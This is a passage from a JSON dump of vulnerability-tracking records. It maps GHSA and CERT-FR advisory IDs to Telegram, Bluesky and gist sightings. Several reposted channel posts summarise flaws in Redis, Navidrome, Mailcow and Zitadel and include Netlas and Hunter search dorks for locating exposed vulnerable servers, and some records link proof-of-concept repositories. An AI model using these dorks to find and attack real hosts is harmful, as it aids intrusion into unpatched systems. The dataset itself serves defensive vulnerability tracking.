"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m\n\nCommand injection vulnerability in getWindowsIEEE8021x (SSID)\n#github #poc", "creation_timestamp": "2024-12-26T21:24:21.000000Z"}, {"uuid": "3ce5b0d7-8e49-493e-8424-53acdeb67863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MJ5-HJJJ-8RGW", "type": "published-proof-of-concept", "source": "https://t.me/haj3imad/112", "content": "https://github.com/JAckLosingHeart/CVE-2024-55875\n\nCVE-2024-55875 | GHSA-7mj5-hjjj-8rgw | http4k first CVE\n#github #exploit", "creation_timestamp": "2024-12-16T15:16:20.000000Z"}, {"uuid": "064ee100-47d4-4288-9f1c-122cebc447bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WHXG-WX83-85P5", "type": "seen", "source": "https://t.me/BlackLineCH/63", "content": "CVE-2024-31449 dan lainnya: Beberapa kerentanan di Redis, rating 4.5 - 8.8\n\nTiga kerentanan terbaru memungkinkan penyerang untuk melakukan Remote Code Execution (RCE) akibat kesalahan dalam Lua scripting engine atau serangan Denial of Service (DoS) melalui Access Control List yang salah.\n\nCari di Netlas.io: \n\ud83d\udc49 Link: https://nt.ls/1G7ul \n\ud83d\udc49 Dork: protocol:redis\n\nAdvisori dari vendor: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5\n\n#BlackLine", "creation_timestamp": "2024-10-07T15:24:43.000000Z"}, {"uuid": "ba3429a5-440c-4931-b8ba-1b4432ed3674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "seen", "source": "https://t.me/BlackLineCH/65", "content": "CVE-2024-47062: SQL Injection dan Auth Bypass di Navidrome Music Server, rating 9.4 \ud83d\udd25\n\nPemberitahuan terbaru mengungkapkan beberapa kerentanan, yang secara teori memungkinkan penyerang untuk mendapatkan akses ke data sensitif.\n\nCari di Netlas.io: \n\ud83d\udc49 Link: https://nt.ls/N9Jj8 \n\ud83d\udc49 Dork: http.description:\"Navidrome Music Server\"\n\nPemberitahuan vendor: https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6", "creation_timestamp": "2024-10-08T11:29:13.000000Z"}, {"uuid": "58b458e3-8f71-4856-811b-a30410edc237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVV5-9H9W-QP2M", "type": "seen", "source": "https://t.me/suboxone_chatroom/1583", "content": "#WLAN_Security\n1. PMKID Attacks:\nDebunking the 802.11r Myth\nhttps://www.nccgroup.com/us/research-blog/pmkid-attacks-debunking-the-80211r-myth\n2. Command injection vulnerability in getWindowsIEEE8021x (SSID)\nhttps://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m", "creation_timestamp": "2025-01-27T07:07:53.000000Z"}, {"uuid": "33356afe-0248-4dbc-a404-50891fbe7ef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23C8-4WWR-G3C6", "type": "seen", "source": "https://t.me/suboxone_chatroom/7394", "content": "CVE-2024-56529: Session Fixation in Mailcow, 7.5 rating\u2757\ufe0f\n\nThe application does not disable old session IDs, which allows a remote attacker to use existing IDs in the victim's browser.\n\nSearch at Netlas.io:\n\ud83d\udc49 Link: https://nt.ls/AuyJw\n\ud83d\udc49 Dork: http.title:\"mailcow UI\"\n\nVendor's advisory: https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-23c8-4wwr-g3c6", "creation_timestamp": "2025-04-01T12:36:32.000000Z"}, {"uuid": "d9cf236b-f5bb-4097-9314-b78357ba91bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3GH-529W-V32X", "type": "seen", "source": "https://t.me/suboxone_chatroom/7471", "content": "\ud83d\udee1CVE-2025-27507(CVSS 9.0): Zitadel Insecure Direct Object Reference (IDOR) Vulnerability\n\n\ud83d\udc7bDork:\nHUNTER : http://product.name=\"Zitadel\"\n\n\u26a0\ufe0fRefer:https://securityonline.info/cve-2025-27507-cvss-9-0-zitadel-users-at-risk-of-account-takeover/\n\n\ud83d\udda5https://github.com/zitadel/zitadel/security/advisories/GHSA-f3gh-529w-v32x\n\n#hunterhow #infosec #infosecurity #OSINT #Vulnerability", "creation_timestamp": "2025-04-01T12:38:04.000000Z"}, {"uuid": "addb7de4-ca87-4f7e-9ff9-1d807e11d27b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "seen", "source": "https://t.me/cyberteamvlayingsecurity/521", "content": "CVE-2024-47062: SQL Injection dan Auth Bypass di Navidrome Music Server, rating 9.4 \ud83d\udd25\n\nPemberitahuan terbaru mengungkapkan beberapa kerentanan, yang secara teori memungkinkan penyerang untuk mendapatkan akses ke data sensitif.\n\nCari di Netlas.io: \n\ud83d\udc49 Link: https://nt.ls/N9Jj8 \n\ud83d\udc49 Dork: http.description:\"Navidrome Music Server\"\n\nPemberitahuan vendor: https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6", "creation_timestamp": "2024-10-08T11:58:03.000000Z"}, {"uuid": "f721ba95-86f1-464c-841a-13ad45e87246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WHXG-WX83-85P5", "type": "seen", "source": "https://t.me/cyberteamvlayingsecurity/495", "content": "CVE-2024-31449 dan lainnya: Beberapa kerentanan di Redis, rating 4.5 - 8.8\n\nTiga kerentanan terbaru memungkinkan penyerang untuk melakukan Remote Code Execution (RCE) akibat kesalahan dalam Lua scripting engine atau serangan Denial of Service (DoS) melalui Access Control List yang salah.\n\nCari di Netlas.io: \n\ud83d\udc49 Link: https://nt.ls/1G7ul \n\ud83d\udc49 Dork: protocol:redis\n\nAdvisori dari vendor: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5\n\n#BlackLine", "creation_timestamp": "2024-10-07T15:35:52.000000Z"}, {"uuid": "33879990-0f76-4464-a719-4c30fafdab64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pxcx-fv34-x9p5", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mw2uusaswl2g", "content": "", "creation_timestamp": "2026-09-21T23:35:46.168215Z"}, {"uuid": "126b364d-c697-45e3-8969-3f6b7de846a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jr34-h97m-9hpx", "type": "seen", "source": "https://gist.github.com/alon710/ad227f40c773c675cce4604553df73dc", "content": "", "creation_timestamp": "2026-09-21T23:31:26.873013Z"}, {"uuid": "872538d1-fd8b-4eee-ae21-9f1de74d4925", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3v3m-wc6v-x4x3", "type": "seen", "source": "https://bsky.app/profile/mfahlandt.bsky.social/post/3mkzbtsjhx52w", "content": "", "creation_timestamp": "2026-05-04T08:45:23.978266Z"}, {"uuid": "9a3f9a20-2a8f-468d-ac29-6440f213648e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pxcx-fv34-x9p5", "type": "seen", "source": "https://gist.github.com/alon710/c22586b9d9c77f8331c17f01285d9c0d", "content": "", "creation_timestamp": "2026-09-21T22:32:02.805018Z"}, {"uuid": "1e1efcfe-0869-4eb3-be8b-dec4c863cc0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w6f5-v2h6-g786", "type": "seen", "source": "https://bsky.app/profile/scoutmonitoring.bsky.social/post/3mw2nuanygu2x", "content": "", "creation_timestamp": "2026-09-21T21:30:11.168381Z"}, {"uuid": "cd917ff7-5516-41fc-8f5a-14a3c8d0a14a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x5fp-wj9c-mxmx", "type": "seen", "source": "https://gist.github.com/konard/c8a6ea404fcd2d5d08c042df8a4bdcd5", "content": "", "creation_timestamp": "2026-09-21T19:09:37.616470Z"}, {"uuid": "021e4969-60c7-4078-b719-51d8a916e4d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v245-v573-v5vm", "type": "seen", "source": "https://gist.github.com/konard/c8a6ea404fcd2d5d08c042df8a4bdcd5", "content": "", "creation_timestamp": "2026-09-21T19:09:16.327376Z"}, {"uuid": "3ecad0ad-3df6-43f9-b6bf-1d809f19ad23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-22p9-wv53-3rq4", "type": "seen", "source": "https://gist.github.com/konard/c8a6ea404fcd2d5d08c042df8a4bdcd5", "content": "", "creation_timestamp": "2026-09-21T19:08:55.299356Z"}, {"uuid": "23e5d202-678e-42a3-9352-fe987165707d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6v5v-wf23-fmfq", "type": "seen", "source": "https://gist.github.com/konard/c8a6ea404fcd2d5d08c042df8a4bdcd5", "content": "", "creation_timestamp": "2026-09-21T19:08:32.323456Z"}, {"uuid": "e781940c-38c5-4628-951f-615f57c53e41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q8mj-m7cp-5q26", "type": "seen", "source": "https://gist.github.com/konard/c8a6ea404fcd2d5d08c042df8a4bdcd5", "content": "", "creation_timestamp": "2026-09-21T19:08:10.819591Z"}, {"uuid": "b1827b10-e736-4e35-b82d-cf631296b607", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4mjr-xmp4-gh2g", "type": "seen", "source": "https://gist.github.com/konard/c8a6ea404fcd2d5d08c042df8a4bdcd5", "content": "", "creation_timestamp": "2026-09-21T19:07:49.196534Z"}, {"uuid": "ddcb30a9-b2f8-44c1-9f06-c1953f1670fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-phg3-3g28-wq9v", "type": "seen", "source": "https://gist.github.com/alon710/cd3d4f295cb3f81bbf208f1f924aafe9", "content": "", "creation_timestamp": "2026-09-21T16:31:47.653936Z"}, {"uuid": "2de0ee5e-76ab-4e00-8b0a-66eddc2b656a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-88QP-4G94-3RF3", "type": "seen", "source": "https://t.me/bdufstecru/3472", "content": "", "creation_timestamp": "2026-09-21T15:00:03.671372Z"}, {"uuid": "934dc010-0050-48bc-8421-ec4fcedd3118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-040", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117309457770446816", "content": "", "creation_timestamp": "2026-09-21T14:18:02.917778Z"}, {"uuid": "d0abc979-932e-4538-af7d-fcea857a5795", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-040", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mvzvp7hn2r2x", "content": "", "creation_timestamp": "2026-09-21T14:17:52.236112Z"}, {"uuid": "735353df-6aa3-469f-ba50-d172ebffb836", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-020", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116517067825437115", "content": "", "creation_timestamp": "2026-05-04T15:42:46.808095Z"}, {"uuid": "c105d434-b455-4b3f-8445-52f1b75576db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-020", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mkzz5za2nx23", "content": "", "creation_timestamp": "2026-05-04T15:42:42.935858Z"}, {"uuid": "c1068ff8-80c5-46fc-8bcf-57373f1f90f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-020", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mkzz4cqpnu2p", "content": "", "creation_timestamp": "2026-05-04T15:41:45.517970Z"}, {"uuid": "f09c2699-2719-4dd8-9611-869c5b1353ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M8RW-V4F6-8787", "type": "seen", "source": "https://t.me/bdufstecru/3129", "content": "", "creation_timestamp": "2026-05-04T14:34:05.000000Z"}, {"uuid": "a600850c-19ef-418d-b12e-18e745a6ba3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-grj5-jjm8-h35p", "type": "seen", "source": "https://gist.github.com/alon710/e818aa393dda5bd140273420e0cde714", "content": "", "creation_timestamp": "2026-05-04T16:40:28.000000Z"}, {"uuid": "04ad6cdf-6c21-433b-8b8e-e2639334f208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qm77-8qjp-4vcm", "type": "seen", "source": "https://gist.github.com/alon710/d4f3d9fbcfea6645ceefb383fa46637f", "content": "", "creation_timestamp": "2026-05-04T17:10:29.000000Z"}, {"uuid": "81ca314b-5f6f-4c8b-92be-a1169c7b65db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f3f2-mcxc-pwjx", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3ml2hnvchcj26", "content": "", "creation_timestamp": "2026-05-04T20:02:07.900836Z"}, {"uuid": "7981d8f6-4bbb-4ea5-8597-1ed3cef928ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q49m-57vm-c8cc", "type": "seen", "source": "https://gist.github.com/alon710/e5f670283b66e1c583d8b3f3f9d1efba", "content": "", "creation_timestamp": "2026-05-04T20:10:29.000000Z"}, {"uuid": "5aae6060-f6b3-41d4-a030-4905c34831b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x3h8-jrgh-p8jx", "type": "seen", "source": "https://gist.github.com/alon710/b60926baf5e2d9d70756e13d5032afa9", "content": "", "creation_timestamp": "2026-05-04T20:40:29.000000Z"}, {"uuid": "db6965e5-fef2-421b-89e1-3f46e67aacf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G38R-8GMR-GHRF", "type": "seen", "source": "https://gist.github.com/alon710/15d45700e9c417f92716ddfa05ebc56f", "content": "", "creation_timestamp": "2026-05-04T22:10:29.000000Z"}, {"uuid": "082d7da5-5812-438a-a31b-8790fe23ca74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G27R-R6PH-VF5R", "type": "seen", "source": "https://gist.github.com/alon710/8bd2dbffc6a75ce658a3738a2c5b48e0", "content": "", "creation_timestamp": "2026-05-04T23:10:28.000000Z"}, {"uuid": "2a8a2066-2a39-4cdd-8e46-0974fe6232e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qg5c-hvr5-hjgr", "type": "seen", "source": "https://gist.github.com/limcheekin/b22dc88a260c8e395b6d84d05bd62a04", "content": "", "creation_timestamp": "2026-05-04T23:31:29.000000Z"}, {"uuid": "daa6f426-adab-4044-bda4-93ab7b397747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-96vc-wcxf-jjff", "type": "seen", "source": "https://gist.github.com/limcheekin/b22dc88a260c8e395b6d84d05bd62a04", "content": "", "creation_timestamp": "2026-05-04T23:31:29.000000Z"}, {"uuid": "0f972096-645d-44fd-a02e-6987ae1f7088", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FC86-6RV6-2JPM", "type": "seen", "source": "https://gist.github.com/alon710/279687d56a2dbfb6a69dcdc1e458b314", "content": "", "creation_timestamp": "2026-05-04T23:40:29.000000Z"}, {"uuid": "eb35bdc9-1f28-4637-86fb-796d0a387e68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GXXH-8VCJ-W2MH", "type": "seen", "source": "https://gist.github.com/alon710/8bb704e5f538c265ec11484d13063fb4", "content": "", "creation_timestamp": "2026-05-05T00:10:29.000000Z"}, {"uuid": "7c1a287d-0fa9-4dde-9a40-250c92b7e7b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vf2m-468p-8v99", "type": "seen", "source": "https://gist.github.com/alon710/0dfb4618501419ce7bdb20d2764642a8", "content": "", "creation_timestamp": "2026-05-05T00:40:29.000000Z"}, {"uuid": "c3c8fe7b-e0e3-4164-932a-4e7ab27283e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-445q-vr5w-6q77", "type": "seen", "source": "https://gist.github.com/alon710/f60cd3417122b17fedb1824de3dd0f54", "content": "", "creation_timestamp": "2026-05-05T01:10:29.000000Z"}, {"uuid": "3287f397-c8e9-47bd-9265-eb09cee86d9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7pr-hjqh-92cm", "type": "seen", "source": "https://gist.github.com/alon710/f7e9943ac304fddb338906da41495cb0", "content": "", "creation_timestamp": "2026-05-05T01:40:28.000000Z"}, {"uuid": "33c9e71a-adc5-443b-a827-71b0548141d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-54g3-hfwv-qg7p", "type": "seen", "source": "https://gist.github.com/Elmagek404/f34fa60f48b04d8ca28886096ae5e05c", "content": "", "creation_timestamp": "2026-05-05T02:14:46.000000Z"}, {"uuid": "eed421f6-e549-40e3-863e-f17b7b13eb6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-62hf-57xw-28j9", "type": "seen", "source": "https://gist.github.com/alon710/80e5845ba30ef0e257e4add1fe792629", "content": "", "creation_timestamp": "2026-05-05T02:10:29.000000Z"}, {"uuid": "4f138a12-48d8-4312-a8ca-81875b624904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5c9x-8gcm-mpgx", "type": "seen", "source": "https://gist.github.com/alon710/0c5e31af5ca396bb556703780eb15c80", "content": "", "creation_timestamp": "2026-05-05T02:40:29.000000Z"}, {"uuid": "6a5ff5f4-7e8d-4fce-8345-97ecfdc47644", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pf86-5x62-jrwf", "type": "seen", "source": "https://gist.github.com/alon710/207351104330f20458b16ad3e50712e0", "content": "", "creation_timestamp": "2026-05-05T03:10:29.000000Z"}, {"uuid": "868cf09a-4f67-4369-87a8-1b42e9b59bd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xx6v-rp6x-q39c", "type": "seen", "source": "https://gist.github.com/alon710/059ddc175def05e4e65c2e2b81657e9a", "content": "", "creation_timestamp": "2026-05-05T04:10:29.000000Z"}, {"uuid": "f61bad6c-38f6-434d-99eb-be786b35a0d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w9j2-pvgh-6h63", "type": "seen", "source": "https://gist.github.com/alon710/19dd0e73e4b7ccaafafb6dcbeaa878b0", "content": "", "creation_timestamp": "2026-05-05T05:10:29.000000Z"}, {"uuid": "65a0a7a2-34f3-46fc-827f-876325769f7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pmwg-cvhr-8vh7", "type": "seen", "source": "https://gist.github.com/alon710/1fe74fd0f0234822bdcb48ade706690f", "content": "", "creation_timestamp": "2026-05-05T05:40:29.000000Z"}, {"uuid": "ae9da22b-c74d-4b90-b459-28505fb94c08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3w6x-2g7m-8v23", "type": "seen", "source": "https://gist.github.com/alon710/0bdb9caf0575ab62bae42776ae4e7cf3", "content": "", "creation_timestamp": "2026-05-05T06:10:28.000000Z"}, {"uuid": "fc609a07-7e3b-4c42-bb24-7d872a5706a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhjh-pmcv-23jw", "type": "seen", "source": "https://gist.github.com/alon710/a4832f5644ea33cbf9cc97531ba69607", "content": "", "creation_timestamp": "2026-05-05T06:40:30.000000Z"}, {"uuid": "5326d362-27e0-49cb-87e2-37119aaec1e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/alon710/cc4d9b85509a9bc85167e4592e568bc8", "content": "", "creation_timestamp": "2026-05-05T06:40:28.000000Z"}, {"uuid": "0801b2d9-853b-4897-97e9-6770cef3b874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qvjj-29qf-hp7p", "type": "seen", "source": "https://gist.github.com/alon710/f3beac366d11264132c16ea4f9f1b920", "content": "", "creation_timestamp": "2026-05-05T16:40:29.000000Z"}, {"uuid": "2d263ed2-0453-4025-b00e-32e67f1cd556", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ffh4-j6h5-pg66", "type": "seen", "source": "https://gist.github.com/alon710/4330d672e3cd0f4cc748d6de83e526ff", "content": "", "creation_timestamp": "2026-05-05T17:10:29.000000Z"}, {"uuid": "725ceee1-9491-4827-b288-3fa40b53fa38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R7CG-QJJM-XHQQ", "type": "seen", "source": "https://gist.github.com/alon710/ba9b0db74ec141f4dfe472b1318d5102", "content": "", "creation_timestamp": "2026-05-05T17:40:29.000000Z"}, {"uuid": "f1f2ae93-ed9e-4c25-9195-9aefc7b8e915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pxhg-7xr2-w7xg", "type": "seen", "source": "https://gist.github.com/alon710/b2bc5ba5f8df2172d7f1f2a079b556ec", "content": "", "creation_timestamp": "2026-05-05T19:10:28.000000Z"}, {"uuid": "cc6b24fc-f4be-4f23-8325-28421c8f19f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8rm2-7qqf-34qm", "type": "seen", "source": "https://gist.github.com/alon710/a8e4ac23aec9e5a4ede7f32cda789bc3", "content": "", "creation_timestamp": "2026-05-05T20:10:29.000000Z"}, {"uuid": "13ea5b62-8b01-4779-aaa7-f3d6865c0391", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c2fv-2fmj-9xrx", "type": "seen", "source": "https://gist.github.com/alon710/bda89e90af91af7f573f2d831677b6d7", "content": "", "creation_timestamp": "2026-05-05T20:40:29.000000Z"}, {"uuid": "59351060-65f7-485e-a126-86299ad78a67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7jrr-xw9c-mj39", "type": "seen", "source": "https://gist.github.com/alon710/26efd138450d4334005446be8418f3bc", "content": "", "creation_timestamp": "2026-05-05T21:10:29.000000Z"}, {"uuid": "6d6d4ffb-e066-4f68-b5e5-13689611f23f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FW8G-CG8F-9J28", "type": "seen", "source": "https://gist.github.com/alon710/732fb73007773b3c7944069ce75d1865", "content": "", "creation_timestamp": "2026-05-05T22:10:29.000000Z"}, {"uuid": "b12cf388-9df9-4fea-a874-f22ea56e3655", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7ww3-xvf5-cxwm", "type": "seen", "source": "https://gist.github.com/alon710/1d05503905d86d5b6619223d3f318c59", "content": "", "creation_timestamp": "2026-05-06T03:10:29.000000Z"}, {"uuid": "558df5df-4fd7-480b-8b0f-eb142f632ab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MGGX-P7JF-JGW4", "type": "seen", "source": "https://gist.github.com/alon710/9fc35b1e537c7d33fcc6512ec6181c7a", "content": "", "creation_timestamp": "2026-05-06T07:10:29.000000Z"}, {"uuid": "85fddb8c-e21e-4812-8cd4-12e620d986b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fg3j-5w9g-hmg7", "type": "seen", "source": "https://gist.github.com/alon710/cdeb633d740e110eed8363124062a03a", "content": "", "creation_timestamp": "2026-05-06T07:40:29.000000Z"}, {"uuid": 